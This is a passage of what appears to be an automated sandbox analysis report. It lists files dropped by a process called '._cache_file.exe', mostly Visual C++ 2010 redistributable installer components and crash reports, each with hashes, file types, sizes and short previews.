                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
                                                                                            MD5:3B4861F93B465D724C60670B64FCCFCF
                                                                                            SHA1:C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
                                                                                            SHA-256:7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
                                                                                            SHA-512:2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5043420982993396
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
                                                                                            MD5:70006BF18A39D258012875AEFB92A3D1
                                                                                            SHA1:B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
                                                                                            SHA-256:19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
                                                                                            SHA-512:97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.4948009720290445
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
                                                                                            MD5:FB4DFEBE83F554FAF1A5CEC033A804D9
                                                                                            SHA1:6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
                                                                                            SHA-256:4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
                                                                                            SHA-512:3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.513882730304912
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
                                                                                            MD5:D1C53003264DCE4EFFAF462C807E2D96
                                                                                            SHA1:92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
                                                                                            SHA-256:5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
                                                                                            SHA-512:C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):4.824239610266714
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
                                                                                            MD5:7D62E82D960A938C98DA02B1D5201BD5
                                                                                            SHA1:194E96B0440BF8631887E5E9D3CC485F8E90FBF5
                                                                                            SHA-256:AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
                                                                                            SHA-512:AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):36710
                                                                                            Entropy (8bit):5.3785085024370805
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
                                                                                            MD5:3D25D679E0FF0B8C94273DCD8B07049D
                                                                                            SHA1:A517FC5E96BC68A02A44093673EE7E076AD57308
                                                                                            SHA-256:288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
                                                                                            SHA-512:3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):5.038533294442847
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
                                                                                            MD5:661CBD315E9B23BA1CA19EDAB978F478
                                                                                            SHA1:605685C25D486C89F872296583E1DC2F20465A2B
                                                                                            SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
                                                                                            SHA-512:802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):5.854644771288791
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
                                                                                            MD5:EE2C05CC9D14C29F586D40EB90C610A9
                                                                                            SHA1:E571D82E81BD61B8FE4C9ECD08869A07918AC00B
                                                                                            SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
                                                                                            SHA-512:0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):10134
                                                                                            Entropy (8bit):6.016582854640062
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
                                                                                            MD5:5DFA8D3ABCF4962D9EC41CFC7C0F75E3
                                                                                            SHA1:4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
                                                                                            SHA-256:B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
                                                                                            SHA-512:69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):10134
                                                                                            Entropy (8bit):4.3821301214809045
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
                                                                                            MD5:B2B1D79591FCA103959806A4BF27D036
                                                                                            SHA1:481FD13A0B58299C41B3E705CB085C533038CAF5
                                                                                            SHA-256:FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
                                                                                            SHA-512:5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (314), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):9752
                                                                                            Entropy (8bit):3.5715293676289863
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:gCEIVvHBZC30jzG2aks2G2XVEP2G2KQ6G2nCw+KFl:JFnGMGZeGPGYCrKFl
                                                                                            MD5:03E01A43300D94A371458E14D5E41781
                                                                                            SHA1:C5AC3CD50FAE588FF1C258EDAE864040A200653C
                                                                                            SHA-256:19DE712560E5A25C5D67348996E7D4F95E8E3DB6843086F52CB7209F2098200A
                                                                                            SHA-512:E271D52264FF979AE429A4053C945D7E7288F41E9FC6C64309F0AB805CEC166C825C2273073C4EF9CA5AB33F00802457B17DF103A06CBC35C54642D146571BBB
                                                                                            Malicious:false
                                                                                             Preview:<?xml version="1.0" encoding="utf-16"?>..<Setup xmlns="http://schemas.microsoft.com/Setup/2008/01/im" xmlns:ironman="http://schemas.microsoft.com/Setup/2008/01/im" SetupVersion="1.0">..  <UI Dll="SetupUi.dll" Name="Microsoft Visual C++ 2010  x64 Redistributable Setup" Version="10.0.30319" />..  <Configuration>..    <DisabledCommandLineSwitches>..      <CommandLineSwitch Name="createlayout" />..    </DisabledCommandLineSwitches>..    <UserExperienceDataCollection Policy="UserControlled" />..
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):78152
                                                                                            Entropy (8bit):6.011592088917562
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:sYNItbBL5NWiiESc0exWZnqxMQP8ZOs0JD9rHUq:sYNAB9NWTZctc/gBJ9oq
                                                                                            MD5:006F8A615020A4A17F5E63801485DF46
                                                                                            SHA1:78C82A80EBF9C8BF0C996DD8BC26087679F77FEA
                                                                                            SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
                                                                                            SHA-512:C603ED6F3611EB7049A43A190ED223445A9F7BD5651100A825917198B50C70011E950FA968D3019439AFA0A416752517B1C181EE9445E02DA3904F4E4B73CE76
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):807256
                                                                                            Entropy (8bit):6.357664904941565
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:GS62nlYAqK/AitUgiuVQk/oifPNJIkjbSTzR8NmsBJj:GS62nlYAltBjPNJIkHST18QsBJ
                                                                                            MD5:84C1DAF5F30FF99895ECAB3A55354BCF
                                                                                            SHA1:7E25BA36BCC7DEED89F3C9568016DDB3156C9C5A
                                                                                            SHA-256:7A0D281FA802D615EA1207BD2E9EBB98F3B74F9833BBA3CB964BA7C7E0FB67FD
                                                                                            SHA-512:E4FB7E4D39F094463FDCDC4895AB2EA500EB51A32B6909CEC80A526BBF34D5C0EB98F47EE256C0F0865BF3169374937F047BF5C4D6762779C8CA3332B4103BE3
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):295248
                                                                                            Entropy (8bit):6.262127887617593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:/LTVUK59JN+C0iy4Ww8oBcPFIOrvHvr8QDZHAAKWiIHT6llN1QkvQZaiionv5y/y:HOoMFrz8ygAKWiiIyKf73w
                                                                                            MD5:EB881E3DDDC84B20BD92ABCEC444455F
                                                                                            SHA1:E2C32B1C86D4F70E39DE65E9EBC4F361B24FF4A1
                                                                                            SHA-256:11565D97287C01D22AD2E46C78D8A822FA3E6524561D4C02DFC87E8D346C44E7
                                                                                            SHA-512:5750CEC73B36A3F19BFB055F880F3B6498A7AE589017333F6272D26F1C72C6F475A3308826268A098372BBB096B43FBD1E06E93EECC0A81046668228BC179A75
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):30120
                                                                                            Entropy (8bit):4.990211039591874
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
                                                                                            MD5:2FADD9E618EFF8175F2A6E8B95C0CACC
                                                                                            SHA1:9AB1710A217D15B192188B19467932D947B0A4F8
                                                                                            SHA-256:222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
                                                                                            SHA-512:A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 200 x 200 x 8, image size 40000, resolution 3779 x 3779 px/m, cbSize 41078, bits offset 1078
                                                                                            Category:dropped
                                                                                            Size (bytes):41078
                                                                                            Entropy (8bit):0.3169962482036715
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:SgrNa0EfB4elU+jB+rQXJH4+Cs77hIfVHCv4ToqIzgPc8wcKHL+3:3pa0e4YjB5vAHk4E7zgPcDc53
                                                                                            MD5:43B254D97B4FB6F9974AD3F935762C55
                                                                                            SHA1:F94D150C94064893DAED0E5BBD348998CA9D4E62
                                                                                            SHA-256:91A21EBA9F5E1674919EE3B36EFA99714CFB919491423D888CB56C0F25845969
                                                                                            SHA-512:46527C88F0AED25D89833B9BE280F5E25FFCEAE6BC0653054C8B6D8EBE34EBA58818A0A02A72BD29279310186AC26D522BBF34191FBDE279A269FC9DA5840ACC
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):14246
                                                                                            Entropy (8bit):3.70170676934679
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:VAZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VAB
                                                                                            MD5:332ADF643747297B9BFA9527EAEFE084
                                                                                            SHA1:670F933D778ECA39938A515A39106551185205E9
                                                                                            SHA-256:E49545FEEAE22198728AD04236E31E02035AF7CC4D68E10CBECFFD08669CBECA
                                                                                            SHA-512:BEA95CE35C4C37B4B2E36CC1E81FC297CC4A8E17B93F10423A02B015DDB593064541B5EB7003560FBEEE512ED52869A113A6FB439C1133AF01F884A0DB0344B0
                                                                                            Malicious:false
                                                                                             Preview:<?xml version="1.0" encoding="utf-16"?>..<SetupUI xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui" ..         xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui" >..  <Strings>..    <!-- Reflective property page -->..    <IDS_CAPTION_FORMAT_1S>#(loc.ids_caption_format_1s)</IDS_CAPTION_FORMAT_1S>..    <IDS_IS_REALLY_CANCEL>#(loc.ids_is_really_cancel)</IDS_IS_REALLY_CANCEL>....    <!-- System Requirements page -->..    <SYSREQPAGE_REQUIRED_AND_AVAILABLE_DISK_SPACE>#(loc.sysreq
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):36342
                                                                                            Entropy (8bit):3.0937266645670003
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:S4UR0d5v0SguJQvFQXvDINJh6Fmhvk71sO0Nep3UL9Eu+dOtOcOdOjT5fuPkfuS:S4UR0d5v0QYQLIN/6Fmhvk71sO0Nep3q
                                                                                            MD5:812F8D2E53F076366FA3A214BB4CF558
                                                                                            SHA1:35AE734CFB99BB139906B5F4E8EFBF950762F6F0
                                                                                            SHA-256:0D36A884A8381778BEA71F5F9F0FC60CACADEBD3F814679CB13414B8E7DBC283
                                                                                            SHA-512:1DCC3EF8C390CA49FBCD50C02ACCD8CC5700DB3594428E2129F79FEB81E4CBBEEF1B4A10628B2CD66EDF31A69ED39CA2F4E252AD8AA13D2F793FCA5B9A1EAF23
                                                                                            Malicious:false
                                                                                             Preview:<?xml version="1.0" encoding="utf-16"?>..<SetupUI xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui" xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui" >..  <UI>....    <ResourceDll>SetupResources.dll</ResourceDll>..    <SplashScreen>..      <Hide/>..    </SplashScreen>....    <LCIDHints>..      <LCIDHint>..        <RegKey>HKCU\Software\Microsoft\VisualStudio\9.0\General</RegKey>..        <RegValueName>UILanguage_fake</RegValueName>..      </LCIDHint>..      <LCIDHint>..
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 49 x 49 x 24, image size 7254, resolution 2834 x 2834 px/m, cbSize 7308, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):7308
                                                                                            Entropy (8bit):3.7864255453272464
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:9L9GXidTgX2bqxIS0SRosEYYgJSIf4pKTg7pDdEAeObh8EWu:R/Y2bq10Q/EY1sK8M4bb
                                                                                            MD5:3AD1A8C3B96993BCDF45244BE2C00EEF
                                                                                            SHA1:308F98E199F74A43D325115A8E7072D5F2C6202D
                                                                                            SHA-256:133B86A4F1C67A159167489FDAEAB765BFA1050C23A7AE6D5C517188FB45F94A
                                                                                            SHA-512:133442C4A65269F817675ADF01ADCF622E509AA7EC7583BCA8CD9A7EB6018D2AAB56066054F75657038EFB947CD3B3E5DC4FE7F0863C8B3B1770A8FA4FE2E658
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):144416
                                                                                            Entropy (8bit):6.7404750879679485
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
                                                                                            MD5:3F0363B40376047EFF6A9B97D633B750
                                                                                            SHA1:4EAF6650ECA5CE931EE771181B04263C536A948B
                                                                                            SHA-256:BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
                                                                                            SHA-512:537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................................Rich...................PE..L....IE...........!.........$.....................l.........................@......R.....@.........................D.......$...d....................... (... ......P...8............................\..@.......t.......D............................text............................... ..`.data...............................@....rsrc...............................@..@.reloc....... ......................@..Ba.IE8....IEC....IEP....IEZ.....IEe....IEP...........msvcrt.dll.ADVAPI32.dll.ntdll.DLL.USER32.dll.KERNEL32.dll...............................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Microsoft Cabinet archive data, 4823925 bytes, 19 files, at 0x44 +A "F_CENTRAL_atl100_x64" +A "F_CENTRAL_mfc100_x64", flags 0x4, number 1, extra bytes 20 in head, 439 datablocks, 0x1503 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):4829869
                                                                                            Entropy (8bit):7.999861791193514
                                                                                            Encrypted:true
                                                                                            SSDEEP:98304:ULaxrwQE3xM5HwcIqZZSPlG9Z27TinTCc/1oQv/ZhU8:UL0rwQEhyHwcIUYSoi+ctf/LU8
                                                                                            MD5:96253C1D1B54044A8640E9932DFCA0B9
                                                                                            SHA1:CC7E1D06D63D4A2C6502AD450E3C3B3458EE0A44
                                                                                            SHA-256:50EEC49FAD75C67968F75E53BA21AEDF22BB11271F5CE8DE37AA48955697C6CE
                                                                                            SHA-512:82D75BA90E44D74DC94C7D246D5B6594F2F773E9748F235585F05A065F476A4CB690DD2B78BEB5EF8B661F9FE826585B5CCA2B3AA80E7506B8CD2B76D5AD770E
                                                                                            Malicious:false
                                                                                            Preview:MSCF....u.I.....D...........................u.I.8...........[.......Hk........r<.L .F_CENTRAL_atl100_x64.H.S.Hk....r<.L .F_CENTRAL_mfc100_x64.P....>V...r<.L .F_CENTRAL_mfc100chs_x64.P.....V...r<.L .F_CENTRAL_mfc100cht_x64.P...0YW...r<.L .F_CENTRAL_mfc100deu_x64.P....TX...r<.L .F_CENTRAL_mfc100enu_x64.P....+Y...r<.L .F_CENTRAL_mfc100esn_x64.P... %Z...r<.L .F_CENTRAL_mfc100fra_x64.P...p [...r<.L .F_CENTRAL_mfc100ita_x64.P.....\...r<.L .F_CENTRAL_mfc100jpn_x64.P.....\...r<.L .F_CENTRAL_mfc100kor_x64.P...`h]...r<.L .F_CENTRAL_mfc100rus_x64.PET..U^...r<.L .F_CENTRAL_mfc100u_x64.Pe........r<.L .F_CENTRAL_mfcm100_x64.Pe..P.....r<.L .F_CENTRAL_mfcm100u_x64.PE...e....r<.L .F_CENTRAL_msvcp100_x64.P.......r<.L .F_CENTRAL_msvcr100_x64.P...@L....r<.L .F_CENTRAL_vcomp100_x64.P....+....s<.6 .FL_msdia71_dll_2_60035_amd64_ln.3643236F_FC70_11D3_A536_0090278A1BB8.@.].J=..[........."..$..N...Z..{..........r.=.C.......@@....Tx...6.....;.a*..a....g.|.....Y.y....P.........}...m..9{.9...i...ygw[...B.M6
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2010 x64 Redistributable, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319., Template: x64;0, Revision Number: {4DB491B7-9632-4543-AC91-D4B80F6DBE17}, Create Time/Date: Fri Mar 19 15:50:42 2010, Last Saved Time/Date: Fri Mar 19 15:50:42 2010, Number of Pages: 200, Name of Creating Application: Windows Installer XML (3.5.0626.0), Security: 2, Number of Words: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):168960
                                                                                            Entropy (8bit):6.262629898297588
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:POTbkSoT5jvtXSH/+rzTPe9oPxM5DNmHWVcqelSxbfS695:mTwSoT5jdSGP2f5hB
                                                                                            MD5:93BB8E3E96A206B39175345111D452E2
                                                                                            SHA1:3D4D02D0240E2651E14947772498C1AF73EDFBC8
                                                                                            SHA-256:392710654BDC1DAAD76240584ED3C375D7C42821D8CB8B38867F9A13DB72392B
                                                                                            SHA-512:B7C77F793379A1E55818E66D7C205508E25AB08D93029D29FA7E6886D6C0942BB914479D6BD4039CC48CC2F34A55E6D6888266166E540F919F5218DC4AF9F302
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 164 x 628 x 24, image size 308978, resolution 2834 x 2834 px/m, cbSize 309032, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):309032
                                                                                            Entropy (8bit):6.583379857106919
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:yUDLmozgtuVYKKKvwUbKh5+/uWLspp2e1jSaMsb1bIZU0g0WQbO//QGVYBtGKQgc:yUDLmozvygKjzbIGgBZBkUfDfc
                                                                                            MD5:1A5CAAFACFC8C7766E404D019249CF67
                                                                                            SHA1:35D4878DB63059A0F25899F4BE00B41F430389BF
                                                                                            SHA-256:2E87D5742413254DB10F7BD0762B6CDB98FF9C46CA9ACDDFD9B1C2E5418638F2
                                                                                            SHA-512:202C13DED002D234117F08B18CA80D603246E6A166E18BA422E30D394ADA7E47153DD3CCE9728AFFE97128FDD797FE6302C74DC6882317E2BA254C8A6DB80F46
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):118
                                                                                            Entropy (8bit):3.5700810731231707
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                            MD5:573220372DA4ED487441611079B623CD
                                                                                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                            Malicious:false
                                                                                             Preview:<?xml version="1.0" encoding="UTF-16"?>..<HeartbeatCache/>
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.1333234482831043
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:wbZfVpsKuImE0jM3ODzJDzqjLOA/FcdsJzuiF4fZ24IO8EKDzy:sDy9FjM3OJqjkCzuiF4fY4IO8zy
                                                                                            MD5:F011288B63207603C2F3F33D7E149CC6
                                                                                            SHA1:9BC6879E4BA8BD3936015FD3B5247795547CD82E
                                                                                            SHA-256:184FB7C64FAE6155596D469E17CEC7D58E047EECDEF95E374ACFE325DF513618
                                                                                            SHA-512:0311395D3E0769213B8C1999B764E987E14969DA4A6881786F9E05D68E4ACC6E789B75E81A05973F70EAA797C5D9CBFC1519B253694012E657523286D62B0DE0
                                                                                            Malicious:false
                                                                                             Preview:Version=1..EventType=APPCRASH..EventTime=133803198160140860..ReportType=2..Consent=1..UploadTime=133803198257641003..ReportStatus=524384..ReportIdentifier=39cf2af4-b331-442c-a8a9-dcfabfc5bc2a..IntegratorReportIdentifier=b4b07e29-3fe2-46ab-8f73-b4efb0e9ff04..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=00001e20-0001-0014-4d9d-0ca44c5ddb01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000b48603f6a1dffab2ff458780025f6a3c2e523c3c!Synaptics.exe..TargetAppVe
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Jan 2 19:30:18 2025, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):4397728
                                                                                            Entropy (8bit):2.112151211997434
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:Rjkp0smAHcy7eMZBC+X3BQGjYD0D377jA:Rkp60tBCGxBjq03A
